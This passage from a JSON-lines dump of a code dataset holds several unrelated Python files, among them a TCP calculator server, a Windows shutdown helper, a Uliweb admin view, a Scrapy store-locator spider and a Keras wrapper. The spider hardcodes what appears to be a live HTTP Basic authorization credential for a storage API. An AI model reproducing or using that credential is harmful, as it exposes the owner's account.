stack = [node]\n\n for n in nums:\n node = TreeNode(n)\n\n while stack and stack[-1].val < n:\n node.left = stack.pop()\n\n stack[-1].right = node\n stack.append(node)\n\n return stack[0].right\n","sub_path":"1. Problems/d. Stack & Queue/b. Monostack - Build Maximum Binary Tree.py","file_name":"b. 
Monostack - Build Maximum Binary Tree.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"541937926","text":"import socket\nimport threading\nimport socketserver\nimport json\nimport time\nimport hashlib\nimport sys\n\n# Lock mechanism to deal with threads synchronization.\n# Controls access to critical sections during runtime.\nlock = threading.Lock()\n\n\n\"\"\" \nGLOBAL VARIABLES\nUsed to share information across all threads.\n\"\"\"\n\n# Store requests and provide access to its info to all threads.\nglobal request_list\nrequest_list = []\n\n# Deals with maximum delay that the clients will experience when requesting.\n# Used when there are not enough requests in a certain period, so that the server does not hang.\n# Provide access to its info to all threads.\nglobal first_request_time\nfirst_request_time = 0\n\n# Store which operation should be executed on a requests \"batch\".\nglobal operation_to_execute\noperation_to_execute = 0\n\n# Keeps track of how many responses was already sent to clients during a \"batch\".\n# Used to check if all clients that sent a request got a response from the server.\nglobal responses_sent\nresponses_sent = 0\n\n# Keeps track of how many requests were received by the server when there\n# are less than 5 requests within a certain period.\nglobal total_requests\ntotal_requests = 0\n\n# Store an execution hash that is generated from a timestamp (first_request_time).\n# This hash is used to provide a unique identification about a requests \"batch\" execution.\nglobal execution_hash\nexecution_hash = 0\n\nglobal results_vector\nresults_vector = []\n\nglobal results_calculated\nresults_calculated = 0\n\n\nclass ThreadedTCPRequestHandler(socketserver.BaseRequestHandler):\n\n def handle(self):\n #cur_thread = threading.current_thread()\n #response = bytes(\"{}: {}\".format(cur_thread.name, data), 'ascii')\n\n global request_list\n global first_request_time\n global responses_sent\n global total_requests\n global execution_hash\n global results_vector\n global results_calculated\n\n if len(request_list) >= 5:\n print(\"[DEBUG] Server is busy processing a batch of 5 clients already\")\n self.request.sendall(\"SERVER IS BUSY\".encode(\"utf-8\"))\n return\n\n lock.acquire()\n if len(request_list) == 0:\n # start counting timeout\n first_request_time = time.time()\n # generate hash from timestamp for execution batch\n hash_object = hashlib.sha256(str(first_request_time).encode(\"utf-8\"))\n execution_hash = hash_object.hexdigest()\n #print(\"[DEBUG] hex_dig: {0}\".format(execution_hash))\n lock.release()\n\n # Load received client data\n data = str(self.request.recv(1024), 'ascii')\n\n # Load JSON data into python variables\n data_dict = json.loads(data)\n\n client_id = data_dict[\"client_id\"]\n request_code = data_dict[\"request_code\"] # which operation to execute (1:sum, 2:sub, 3:mult or 4:div)\n number_array = data_dict[\"number_array\"]\n number_1 = number_array[0]\n number_2 = number_array[1]\n timestamp = data_dict[\"timestamp\"]\n\n client_data = {\n \"client_address\": self.client_address[0],\n \"client_id\": client_id,\n \"request_code\": request_code,\n \"number_1\": number_1,\n \"number_2\": number_2,\n \"timestamp\": timestamp\n }\n\n # Add client request to request_list\n lock.acquire()\n request_list.append(client_data)\n lock.release()\n \n print(\"[DEBUG] request_list length: {0}\".format(len(request_list)))\n\n # wait while there has not been passed 5 
seconds nor the server has received five requests whithin 5 seconds\n while(len(request_list) < 5):\n if (time.time() - first_request_time > 5):\n total_requests = len(request_list)\n print(\"[DEBUG] total_requests: {0}\".format(total_requests))\n break\n\n lock.acquire()\n if results_calculated == 0:\n self.check_operation_to_execute()\n lock.release()\n\n result = self.calculate(number_1, number_2)\n\n lock.acquire()\n results_calculated = results_calculated + 1\n results_vector.append(\n {\n \"client_id\":client_id,\n \"result\":result[1]\n })\n lock.release()\n\n print(\"[DEBUG] Server calculation response: {0}\".format(result))\n\n while(results_calculated < len(request_list)):\n print(\"[DEBUG] Waiting for all clients calculations to finish...\")\n\n response_dict = {\n \"execution_hash\":execution_hash,\n \"client_id\":client_id,\n \"operation_executed\":operation_to_execute,\n \"execution_status\":result[0],\n \"result\":result[1],\n \"all_clients_results\":results_vector,\n \"timestamp\":time.time()\n }\n \n response_json = json.dumps(response_dict)\n print(\"[DEBUG] Data that will be sent to clients: {0}\".format(response_json))\n\n # Send response to client\n self.request.sendall(response_json.encode(\"utf-8\"))\n\n lock.acquire()\n try:\n print(\"[DEBUG] Lock acquired\")\n responses_sent = responses_sent + 1\n except:\n print(\"[DEBUG] Error while locking resource\")\n finally:\n print(\"[DEBUG] Releasing lock\")\n lock.release()\n \n print(\"[DEBUG] responses_sent: {0}\".format(responses_sent))\n if responses_sent == total_requests or responses_sent >= 5:\n responses_sent = 0\n results_calculated = 0\n print(\"[DEBUG] Clearing results_vector\")\n results_vector.clear()\n print(\"[DEBUG] Clearing request_list\")\n request_list.clear()\n \n def check_operation_to_execute(self):\n # here we should develop a way to check which operation to execute\n # based on clients requests that are stored in <request_list> global variable\n global operation_to_execute\n\n operations_requested = {\n \"sum\":0,\n \"sub\":0,\n \"mult\":0,\n \"div\":0\n }\n\n # check for the most requested operation\n for request in request_list:\n if request[\"request_code\"] == 1:\n operations_requested[\"sum\"] = operations_requested[\"sum\"] + 1\n elif request[\"request_code\"] == 2:\n operations_requested[\"sub\"] = operations_requested[\"sub\"] + 1\n elif request[\"request_code\"] == 3:\n operations_requested[\"mult\"] = operations_requested[\"mult\"] + 1\n elif request[\"request_code\"] == 4:\n operations_requested[\"div\"] = operations_requested[\"div\"] + 1\n \n operation_to_execute = max(operations_requested, key=operations_requested.get)\n\n # solve draw problem (when there are two operations that are equally requested)...\n if len(request_list) >= 5 and operations_requested[operation_to_execute] < 3:\n operation_to_execute = \"draw\"\n else:\n operation_to_execute = max(operations_requested, key=operations_requested.get)\n \n print(\"[DEBUG] Operation to execute: {0}\".format(operation_to_execute))\n\n def server_sum(self, n1, n2):\n execution_status = 0 # response execution status, 0 = error, 1 = success\n result = 0 # calculation result\n\n try:\n result = float(n1) + float(n2)\n execution_status = 1\n except:\n print(\"[DEBUG] Server error while trying to sum\")\n result = 0\n execution_status = 0\n\n return (execution_status, result)\n \n def server_subtract(self, n1, n2):\n execution_status = 0\n result = 0\n\n try:\n result = float(n1) - float(n2)\n execution_status = 1\n except:\n 
print(\"[DEBUG] Server error while trying to subtract\")\n result = 0\n execution_status = 0\n\n return (execution_status, result)\n \n def server_multiply(self, n1, n2):\n execution_status = 0\n result = 0\n\n try:\n result = float(n1) * float(n2)\n execution_status = 1\n except:\n print(\"[DEBUG] Server error while trying to multiply\")\n result = 0\n execution_status = 0\n\n return (execution_status, result)\n \n def server_divide(self, n1, n2):\n execution_status = 0 \n result = 0\n\n try:\n result = float(n1) / float(n2)\n execution_status = 1\n except:\n print(\"[DEBUG] Server error while trying to divide\")\n result = 0\n execution_status = 0\n\n return (execution_status, result)\n \n def calculate(self, n1, n2):\n if operation_to_execute == \"sum\":\n print(\"[DEBUG] Server is going to execute SUM operation\")\n result = self.server_sum(n1, n2)\n\n elif operation_to_execute == \"sub\":\n print(\"[DEBUG] Server is going to execute SUB operation\")\n result = self.server_subtract(n1, n2)\n\n elif operation_to_execute == \"mult\":\n print(\"[DEBUG] Server is going to execute MULT operation\")\n result = self.server_multiply(n1, n2)\n\n elif operation_to_execute == \"div\":\n print(\"[DEBUG] Server is going to execute DIV operation\")\n result = self.server_divide(n1, n2)\n\n elif operation_to_execute == \"draw\":\n print(\"[DEBUG] Server verified that clients did not consent in operation to execute\")\n result = (0,0)\n\n else:\n print(\"[DEBUG] Server error while trying to decide which operation to execute\")\n result = (0,0)\n\n return result\n\n\nclass ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):\n pass\n\n\nif __name__ == \"__main__\":\n # Port 0 means to select an arbitrary unused port\n #HOST = \"localhost\"\n #PORT = 9999\n\n if len(sys.argv) < 2:\n print(\"[DEBUG] Error while parsing data from commando line.\")\n sys.exit(\"[X] IP or port not provided correctly! - Usage: python3 <script.py> <ip_address> <port>\");\n\n HOST = str(sys.argv[1])\n PORT = int(sys.argv[2])\n \n server = ThreadedTCPServer((HOST, PORT), ThreadedTCPRequestHandler)\n\n with server:\n ip, port = server.server_address\n\n # Start a thread with the server -- that thread will then start one\n # more thread for each request\n server_thread = threading.Thread(target=server.serve_forever)\n\n # Exit the server thread when the main thread terminates\n server_thread.daemon = True\n server_thread.start()\n\n print(\"[DEBUG] Server loop running in thread:\", server_thread.name)\n\n while True:\n pass\n #server.shutdown()","sub_path":"mtserver.py","file_name":"mtserver.py","file_ext":"py","file_size_in_byte":10852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"498377705","text":"import csv\nimport datetime\nimport os\n\n\nwhile(1):\n #Defaults\n plu = input(\"What is the PLU? \")\n what = input(\"Description of the item \")\n howmuch = input(\"How much? \")\n who = input(\"Your numbers. 
Example 206430: \")\n when = input(\"What is the date \")\n\n #CSV Writer\n ofile = open('Whats_In_The_Container.csv', \"a\")\n writer = csv.writer(ofile, delimiter=',')\n writer.writerow([plu, what, howmuch, when, who])\n ofile.close()\n\n print()\n print()\n print()\n\n \n\n\n","sub_path":"WorkContainer/Container.py","file_name":"Container.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"188563123","text":"import win32security\nimport win32api\nimport sys\nfrom ntsecuritycon import *\n\n\ndef AdjustPrivilege(priv, enable = 1):\n # Get the process token.\n flags = TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY\n htoken = win32security.OpenProcessToken(win32api.GetCurrentProcess(), flags)\n # Get the ID for the system shutdown privilege.\n id = win32security.LookupPrivilegeValue(None, priv)\n # Now obtain the privilege for this process.\n # Create a list of the privileges to be added.\n if enable:\n newPrivileges = [(id, SE_PRIVILEGE_ENABLED)]\n else:\n newPrivileges = [(id, 0)]\n # and make the adjustment.\n win32security.AdjustTokenPrivileges(htoken, 0, newPrivileges)\n\n\ndef go_shutdown(is_reboot=0):\n AdjustPrivilege(SE_SHUTDOWN_NAME)\n win32api.InitiateSystemShutdown(None, 'Shutdown msg from API Server', 10, 1, is_reboot)\n\n\nif __name__ == '__main__':\n go_shutdown()\n","sub_path":"agent/winvm/shutdown.py","file_name":"shutdown.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"370750614","text":"from osgeo import osr, gdal\nimport sys\nimport pyproj\n\ndef printnn(line):\n print(\"\\r\\n{}\".format(line))\n\ndef show_crs(fname):\n print(fname)\n ds = gdal.Open(fname)\n old_cs= osr.SpatialReference()\n proj_str = ds.GetProjectionRef()\n old_cs.ImportFromWkt(proj_str)\n printnn(old_cs)\n cs = pyproj.CRS.from_string(proj_str)\n printnn(\"EPSG:{}\".format(cs.to_epsg()))\n\nif __name__ ==\"__main__\":\n fname='/home/tony/changed/h28/83.tif'\n if len(sys.argv)>1:\n fname = sys.argv[1]\n show_crs(fname)","sub_path":"crs.py","file_name":"crs.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"159275682","text":"#coding=utf-8\nfrom uliweb import expose, functions\nfrom uliweb.i18n import ugettext_lazy as _\nimport logging\n\nlog = logging.getLogger(__name__)\n\ndef __begin__():\n functions.require_login()\n\n@expose('/admin/models_config')\nclass AdminModelsConfigView(object):\n \"\"\"\n Model administration config app\n \"\"\"\n\n def __init__(self):\n self.model = functions.get_model('model_config')\n self.model_his = functions.get_model('model_config_his')\n\n @expose('')\n def index(self):\n fields = [\n {'name':'display_name', 'width':200},\n {'name':'model_name', 'width':200},\n {'name':'is_published', 'verbose_name':_('Is Published'), 'width':100},\n 'description',\n {'name':'published_time', 'width':150},\n {'name':'action', 'verbose_name':_('Action'), 'width':120}\n ]\n\n def _action(value, obj):\n from uliweb.core.html import Tag\n\n actions = [\n Tag('a', '<i class=\"fa fa-eye\"></i>', title=_('View'),\n href=url_for(self.__class__.view, model_name=obj.model_name),\n _class=\"btn btn-xs btn-primary\"),\n Tag('a', '<i class=\"fa fa-remove\"></i>', title=_('Delete'),\n href=url_for(self.__class__.delete, model_name=obj.model_name),\n _class=\"btn btn-xs btn-danger action-delete\"),\n\n ]\n if 
obj.uuid:\n actions.insert(1, Tag('a', '<i class=\"fa fa-toggle-off\"></i>', title=_('Unpublish'),\n href=url_for(self.__class__.unpublish, model_name=obj.model_name),\n _class=\"btn btn-xs btn-warning action-unpublish\"))\n return ' '.join(map(str, actions))\n\n def _is_published(value, obj):\n if obj.uuid:\n return '<i class=\"fa fa-check-square-o\"></i> (%s)' % obj.uuid\n else:\n return '<i class=\"fa fa-square-o\"></i>'\n\n fields_convert_map = {'action':_action, 'is_published':_is_published}\n\n view =functions.ListView(self.model, fields=fields,\n fields_convert_map=fields_convert_map)\n objects = view.objects()\n return {'view':view, 'objects':objects, 'total':view.total}\n\n def add(self):\n from forms import AddForm\n\n fields = ['model_name', 'display_name', 'table_name', 'description',\n 'basemodel', 'has_extension', 'extension_model']\n\n def post_created_form(fcls, model):\n from uliweb.form.widgets import Button\n\n fcls.layout_class = 'bs3t'\n fcls.form_buttons = [\n str(Button(value=_('Save'), _class=\"btn btn-primary btn-sm\",\n name=\"submit\", type=\"submit\")),\n ]\n\n def pre_save(data):\n from uliweb.utils.common import get_uuid, import_attr\n from uliweb.contrib.model_config import get_model_fields, get_model_indexes\n\n data['uuid'] = get_uuid()[:6]\n if not data['table_name']:\n data['table_name'] = data['model_name'].lower()\n\n if not data['display_name']:\n data['display_name'] = data['model_name']\n\n #add import basemodel support\n if data['basemodel']:\n BM = import_attr(data['basemodel'])\n data['fields'] = get_model_fields(BM)\n data['indexes'] = get_model_indexes(BM)\n\n if data['extension_model']:\n EM = import_attr(data['extension_model'])\n data['extension_fields'] = get_model_fields(EM)\n data['extension_indexes'] = get_model_indexes(EM)\n\n def post_save(obj, data):\n r = self.model(model_name=obj.model_name,\n display_name=obj.display_name,\n description=obj.description,\n modified_user=request.user.id)\n r.save(version=True)\n\n\n view = functions.AddView(self.model_his, ok_url=url_for(self.__class__.index),\n post_created_form=post_created_form,\n form_cls=AddForm,\n pre_save=pre_save,\n post_save=post_save,\n fields=fields, version=True)\n return view.run()\n\n def _get_model(self, model_name, uuid):\n return self.model_his.get((self.model_his.c.model_name==model_name) &\n (self.model_his.c.uuid==uuid))\n\n def view(self, model_name):\n model = self.model.get(self.model.c.model_name==model_name)\n\n uuid = request.GET.get('uuid')\n uuids = [row.uuid for row in\n self.model_his.filter(self.model_his.c.model_name==model_name)\\\n .fields(self.model_his.c.uuid)\\\n .order_by(self.model_his.c.create_time.desc())]\n\n obj = None\n if not uuid and len(uuids)>0:\n uuid = uuids[0]\n\n if uuid in uuids:\n obj = self._get_model(model_name, uuid)\n\n template_data = {'uuids':uuids, 'model_name':model_name,\n 'uuid':uuid, 'object':obj, 'published_uuid':model.uuid if model else ''}\n if obj:\n template_data['columns'] = eval(obj.fields or '[]')\n template_data['indexes'] = eval(obj.indexes or '[]')\n template_data['extension_columns'] = eval(obj.extension_fields or '[]')\n template_data['extension_indexes'] = eval(obj.extension_indexes or '[]')\n fields = ['model_name', 'display_name', 'table_name', 'basemodel', 'has_extension', 'extension_model']\n view = functions.DetailView(self.model_his, obj=obj, fields=fields,\n template_data=template_data)\n return view.run()\n else:\n template_data['view'] = ''\n template_data['columns'] = []\n template_data['indexes'] 
= []\n template_data['extension_columns'] = []\n template_data['extension_indexes'] = []\n return template_data\n\n def save(self, model_name):\n import json as JSON\n from uliweb.utils.common import get_uuid\n\n column_name = request.GET.get('column_name')\n column = JSON.loads(request.POST[column_name])\n uuid = request.GET.get('uuid')\n action = request.GET.get('action')\n\n obj = self._get_model(model_name, uuid)\n old_column = getattr(obj, column_name)\n\n list_columns = column_name in ('fields', 'indexes', 'extension_fields',\n 'extension_indexes')\n if list_columns:\n old_column = eval(old_column or '[]')\n\n index = -1\n if action in ('edit', 'delete'):\n for x in range(len(old_column)):\n if old_column[x]['name'] == column['name']:\n index = x\n break\n\n if index >= 0:\n reserved = old_column[index].pop('_reserved', False)\n else:\n reserved = None\n\n if action in ('add', 'delete') or (index>=0 and old_column[index] != column):\n #if not published, then directly use current record\n if obj.status == '1':\n data = obj.to_dict()\n data.pop('id')\n data.pop('create_time')\n data['status'] = '0'\n obj = self.model_his(**data)\n obj.uuid = get_uuid()[:6]\n\n if list_columns:\n if action == 'add':\n old_column.append(column)\n elif action == 'edit':\n column['_reserved'] = reserved\n old_column[index] = column\n else:\n del old_column[index]\n else:\n old_column = column\n\n setattr(obj, column_name, old_column)\n obj.save(version=True)\n uuid = obj.uuid\n return json({'success':True, 'message':'Success!', 'data':{'uuid':uuid}})\n\n def publish(self, model_name):\n from uliweb.utils import date\n from uliweb.orm import Begin, Commit, Rollback\n\n Begin()\n uuid = request.GET.get('uuid')\n obj = self._get_model(model_name, uuid)\n if not obj:\n return json({'success':False, 'message':\"Model %s(%s) can't be found\" % (model_name, uuid)})\n obj.status = '1'\n obj.published_time = date.now()\n if len(obj.extension_fields) > 0:\n obj.has_extension = True\n obj.save(version=True)\n\n row = self.model.get(self.model.c.model_name==model_name)\n row.uuid = uuid\n row.published_time = date.now()\n row.modified_user = request.user.id\n row.modified_time = obj.published_time\n row.display_name = obj.display_name\n row.description = obj.description\n row.save(version=True)\n\n try:\n M = functions.get_model(model_name)\n M.migrate()\n if obj.has_extension:\n M.ext._model.migrate()\n Commit()\n\n except Exception as e:\n Rollback()\n log.exception(e)\n return json({'success':False, 'message':'Migrate Model %s(%s) Failed!' % (model_name, uuid)})\n return json({'success':True, 'message':'Model %s(%s) has been published successfully!' 
% (model_name, uuid)})\n\n    def unpublish(self, model_name):\n        count = self.model_his.filter(self.model_his.c.model_name==model_name).count()\n        if count <= 1:\n            return json({'success':False, 'message':'There should be at least one existing version'})\n        row = self.model.get(self.model.c.model_name==model_name)\n        row.uuid = ''\n        row.published_time = None\n        row.save(version=True)\n        return json({'success':True})\n\n    def delete(self, model_name):\n        row = self.model.get(self.model.c.model_name==model_name)\n        row.delete()\n\n        for obj in self.model_his.filter(self.model_his.c.model_name==model_name):\n            obj.delete()\n        return json({'success':True})\n\n    def delete_version(self, model_name):\n        uuid = request.GET.get('uuid')\n        row = self.model.get(self.model.c.model_name==model_name)\n\n        version = self._get_model(model_name, uuid)\n        if version.uuid != row.uuid:\n            version.delete()\n        else:\n            return json({'success':False, 'message':\"You can't delete the published version\"})\n\n        return json({'success':True})","sub_path":"uliweb_peafowl/admin_models_config/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"9540705","text":"# -*- coding: utf-8 -*-\nfrom howard_birnbaum.items import HowardBirnbaumItem\nimport scrapy\nimport json\nimport requests\nimport xmltodict\nfrom pyquery import PyQuery\n\n\nclass eldoradostone(scrapy.Spider):\n    name=\"eldoradostone\"\n    all_urls = []\n    scraped_country = ''\n    def __init__(self, country = '', *args,**kwargs):\n\n        url = \"https://storage.scrapinghub.com/collections/293632/s/latlong\"\n        \n        headers = {\n            'content-type': \"application/json\",\n            'authorization': \"Basic ZWE3NmIwMzcxMGU3NDVlOGI2YWIxYTg2MGFiMjcxOGU6\"\n            }\n        \n        response = requests.request(\"GET\", url, headers=headers).json()\n\n        for i in response['value']:\n            self.all_urls.append(i)\n\n\n        \n        \n\n    def start_requests(self):\n        for url in self.all_urls:\n            url1 = url.split('$')\n            req_url = \"http://www.eldoradostone.com/wp-admin/admin-ajax.php?action=store_search&lat={}&lng={}&max_results=100&search_radius=25\".format(str(url1[1]),str(url1[2]))\n            yield scrapy.Request(url=req_url, callback=self.parse)\n    \n    \n    def parse(self, response):\n        \n        r = json.loads(response.body_as_unicode())\n        \n        for m in r:\n            item = HowardBirnbaumItem()\n            try:\n                item['company'] = m['store']\n            except Exception as e:\n                print (e)\n            try:\n                item['address'] = m['address']+' '+m['address2']\n            except Exception as e:\n                print (e) \n            try:\n                item['state'] = m['state']\n            except Exception as e:\n                print (e) \n            try:\n                item['country'] = m['country']\n            except Exception as e:\n                print (e) \n            try:\n                item['phone_number'] = m['phone']\n            except Exception as e:\n                print (e) \n            try:\n                item['web_site_url'] = m['url']\n            except Exception as e:\n                print (e) \n            try:\n                item['email'] = m['email']\n            except Exception as e:\n                print (e) \n            try:\n                item['city'] = m['city']\n            except Exception as e:\n                print (e)\n            try:\n                item['postal_code'] = m['zip']\n            except Exception as e:\n                print (e) \n            \n            yield item\n            \n\n    ","sub_path":"Howard_Birnbaum/howard_birnbaum/build/lib/howard_birnbaum/spiders/eldoradostone.py","file_name":"eldoradostone.py","file_ext":"py","file_size_in_byte":2502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"523333886","text":"# Takes a 1 character number string and returns the factorial\ndef simpleFact(n):\n\tif (n == '9'):\n\t\treturn 362880\n\tif (n == '8'):\n\t\treturn 40320\n\tif (n == 
'7'):\n\t\treturn 5040\n\tif (n == '6'):\n\t\treturn 720\n\tif (n == '5'):\n\t\treturn 120\n\tif (n == '4'):\n\t\treturn 24\n\tif (n == '3'):\n\t\treturn 6\n\tif (n == '2'):\n\t\treturn 2\n\telse:\n\t\treturn 1\n\n\ndef factorial(n):\n\tfact = 1\n\twhile (n > 0):\n\t\tfact *= n\n\t\tn -= 1\n\treturn fact\n\ndef sumFactDigits(n):\n\tn = str(n)\n\ttotal = 0\n\tfor x in range(len(n)):\n\t\ttotal += simpleFact(n[x])\n\treturn total\n\n","sub_path":"Euler/P34 Sum Factorial Digits/p34.py","file_name":"p34.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"232508530","text":"from cluster.preprocess.pre_node_feed import PreNodeFeed\nfrom master.workflow.preprocess.workflow_feed_fr2wcnn import WorkflowFeedFr2Wcnn\nimport pandas as pd\nimport warnings\nimport numpy as np\nfrom konlpy.tag import Mecab\nfrom common.utils import *\n\nclass PreNodeFeedFr2Wcnn(PreNodeFeed):\n \"\"\"\n\n \"\"\"\n\n def run(self, conf_data):\n \"\"\"\n override init class\n \"\"\"\n super(PreNodeFeedFr2Wcnn, self).run(conf_data)\n self._init_node_parm(conf_data['node_id'])\n\n def _get_node_parm(self, node_id):\n \"\"\"\n return conf master class\n :return:\n \"\"\"\n return WorkflowFeedFr2Wcnn(node_id)\n\n def _init_node_parm(self, node_id):\n \"\"\"\n\n :param node_id:\n :return:\n \"\"\"\n try:\n wf_conf = WorkflowFeedFr2Wcnn(node_id)\n self.wf_conf = wf_conf\n self.encode_channel = wf_conf.get_encode_channel\n self.encode_col = wf_conf.get_encode_column\n self.encode_len = wf_conf.get_encode_len\n self.decode_col = wf_conf.get_decode_column\n self.lable_size = wf_conf.get_lable_size\n self.char_embed = wf_conf.char_encode\n self.char_max_len = wf_conf.char_max_len\n self.lable_onehot = OneHotEncoder(self.lable_size)\n if (wf_conf.get_lable_list):\n self.lable_onehot.restore(wf_conf.get_lable_list)\n self.preprocess_type = wf_conf.get_preprocess_type\n self.embed_type = wf_conf.get_embed_type\n self.vocab_size = wf_conf.get_vocab_size + 4\n self.char_embed_size = 160\n if (self.char_embed == True) :\n self.word_vector_size = self.vocab_size + (self.char_embed_size * self.char_max_len)\n else :\n self.word_vector_size = self.vocab_size\n if(self.embed_type == 'onehot') :\n self.input_onehot = OneHotEncoder(self.vocab_size)\n if (wf_conf.get_vocab_list):\n self.input_onehot.restore(wf_conf.get_vocab_list)\n except Exception as e:\n raise Exception(e)\n\n def _convert_data_format(self, file_path, index):\n \"\"\"\n\n :param obj:\n :param index:\n :return:\n \"\"\"\n try :\n store = pd.HDFStore(file_path)\n chunk = store.select('table1',\n start=index.start,\n stop=index.stop)\n count = index.stop - index.start\n if(self.encode_col in chunk and self.decode_col in chunk) :\n words = self.encode_pad(self._preprocess(chunk[self.encode_col].values)[0:count], max_len=self.encode_len)\n encode = self._word_embed_data(self.embed_type, words, cls=self.input_onehot)\n encode = np.array(encode).reshape([-1, self.encode_len, self.vocab_size])\n if (self.char_embed == True):\n encode = self._concat_char_vector(encode, words)\n encode = np.array(encode).reshape([-1, self.encode_len, self.word_vector_size, self.encode_channel])\n decode = np.array(chunk[self.decode_col].values).reshape([-1,1]).tolist()\n return encode, self._word_embed_data(self.embed_type, decode, cls=self.lable_onehot)\n else :\n raise Exception (\"WCNN Data convert error : no column name exists\")\n except Exception as e :\n raise Exception (e)\n finally:\n 
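# the HDF5 store must be closed even when the conversion above raises\n            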
store.close()\n\n def _concat_char_vector(self, encode, words):\n \"\"\"\n concat word embedding vecotr and char level embedding\n :param encode : word vector list\n :param words : word list\n :return: concat vector\n \"\"\"\n return_encode = np.array([])\n for i, vec_list, word_list in zip(range(len(encode)), encode, words) :\n for j, vec, word in zip(range(len(vec_list)), vec_list, word_list) :\n word = word[:self.char_max_len-1] if len(word) > self.char_max_len else word\n pad_len = (self.char_max_len - len(word))\n return_encode = np.append(return_encode,\n np.concatenate([vec,\n np.array(self.get_onehot_vector(word)).reshape([len(word) * self.char_embed_size]),\n np.zeros([pad_len * self.char_embed_size])]))\n return return_encode\n\n\n\n def _preprocess(self, input_data):\n \"\"\"\n\n :param input_data:\n :return:\n \"\"\"\n if(self.preprocess_type == 'mecab') :\n return self._mecab_parse(input_data)\n elif (self.preprocess_type == 'kkma'):\n return self._mecab_parse(input_data)\n elif (self.preprocess_type == 'twitter'):\n return self._mecab_parse(input_data)\n else :\n return list(map(lambda x : x.split(' '), input_data.tolist()))\n\n def data_size(self):\n \"\"\"\n get data array size of this calss\n :return:\n \"\"\"\n try :\n store = pd.HDFStore(self.input_paths[self.pointer])\n table_data = store.select('table1')\n return table_data[table_data.columns.values[0]].count()\n except Exception as e :\n raise Exception (e)\n finally:\n store.close()\n\n def has_next(self):\n \"\"\"\n check if hdf5 file pointer has next\n :return:\n \"\"\"\n if(len(self.input_paths) > self.pointer) :\n return True\n else :\n self.wf_conf.set_lable_list(self.lable_onehot.dics())\n self.wf_conf.set_word_vector_size(self.word_vector_size)\n if (self.embed_type == 'onehot'):\n self.wf_conf.set_vocab_list(self.input_onehot.dics())\n return False\n","sub_path":"cluster/preprocess/pre_node_feed_fr2wcnn.py","file_name":"pre_node_feed_fr2wcnn.py","file_ext":"py","file_size_in_byte":5888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"23711411","text":"# coding=utf-8\r\nimport numpy as np\r\nimport math\r\nimport keras as kr\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense, Activation\r\nimport matplotlib.pyplot as plt\r\nimport random\r\nfrom ann_visualizer.visualize import ann_viz\r\n\r\ndef randomcolor(): \r\n colorArr = ['1','2','3','4','5','6','7','8','9','A','B','C','D','E','F'] \r\n color = \"\" \r\n for i in range(6): \r\n color += colorArr[random.randint(0,14)] \r\n return \"#\"+color\r\n\r\n\r\ndef pl(st,r):\r\n plt.figure(st)\r\n r1los = r[r[3].isin([st])].values\r\n rmse=np.sqrt(np.power(r1los[:, -2]-r1los[:, -1],2).sum()/r1los.shape[0])\r\n plt.plot(r1los[:, 0], r1los[:, -1], randomcolor(),label = 'predict')\r\n plt.plot(r1los[:, 0], r1los[:, -2], randomcolor(),label='raw')\r\n plt.legend()\r\n plt.title(st+'rmse ='+str(rmse))\r\n plt.show()\r\n\r\n\r\nclass NN(object):\r\n model = []\r\n history=[]\r\n\r\n def __init__(self, layers):\r\n self.model = Sequential()\r\n self.model.add(Dense(layers[1][0], activation=layers[1][1], input_dim=layers[0][0]))\r\n #kr.initializers.RandomUniform(minval=init_weight[0], maxval=init_weight[1], seed=None)\r\n kr.layers.ELU(alpha=0.1)\r\n kr.layers.ReLU(negative_slope=0.1)\r\n for i in range(2, len(layers)):\r\n self.model.add(Dense(layers[i][0], activation=layers[i][1]))\r\n\r\n def fit(self, X, Y, learning_rate=0.1, epochs=2, solver=\"Adam\", momentum=1):\r\n if solver == 
\"SGD\":\r\n            solver = kr.optimizers.SGD(\r\n                lr=learning_rate)\r\n        elif solver == \"Adam\":\r\n            solver = kr.optimizers.Adam(\r\n                lr=learning_rate)\r\n        self.model.compile(optimizer=solver, loss='mean_squared_error')\r\n        history=self.LossHistory()\r\n        self.model.fit(X, Y, epochs=epochs,verbose=0,callbacks=[history])\r\n        self.history=history\r\n\r\n    def predict(self, X):\r\n        X = np.array(X)\r\n        pr = self.model.predict(X)\r\n        return pr\r\n\r\n    def loss(self):\r\n        return self.history.losses\r\n\r\n    class LossHistory(kr.callbacks.Callback):\r\n        def on_train_begin(self, logs={}):\r\n            self.losses = []\r\n\r\n        def on_batch_end(self, batch, logs={}):\r\n            self.losses.append(logs.get('loss'))\r\n\r\n    def visual(self,tit):\r\n        ann_viz(self.model,title=tit,filename=tit+'.dot',view=False)","sub_path":"mxnn.py","file_name":"mxnn.py","file_ext":"py","file_size_in_byte":2380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"639239356","text":"import pandas as pd\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\nfrom sklearn.preprocessing import LabelEncoder, StandardScaler\r\nimport sys, argparse\r\n\r\nnp.set_printoptions(precision=4) # Print only four digits\r\n\r\n'''\r\n    Author: Samuel Prevost\r\n    Date: 22/02/2018 14:22:53 UTC+1\r\n    Title: Automatic Linear Discriminant Analysis\r\n    Desc:\r\n        - Aim of LDA: project a feature space (a dataset of n-dimensional samples) onto a smaller subspace k (k <= n-1)\r\n        while maintaining the class-discriminatory information.\r\n        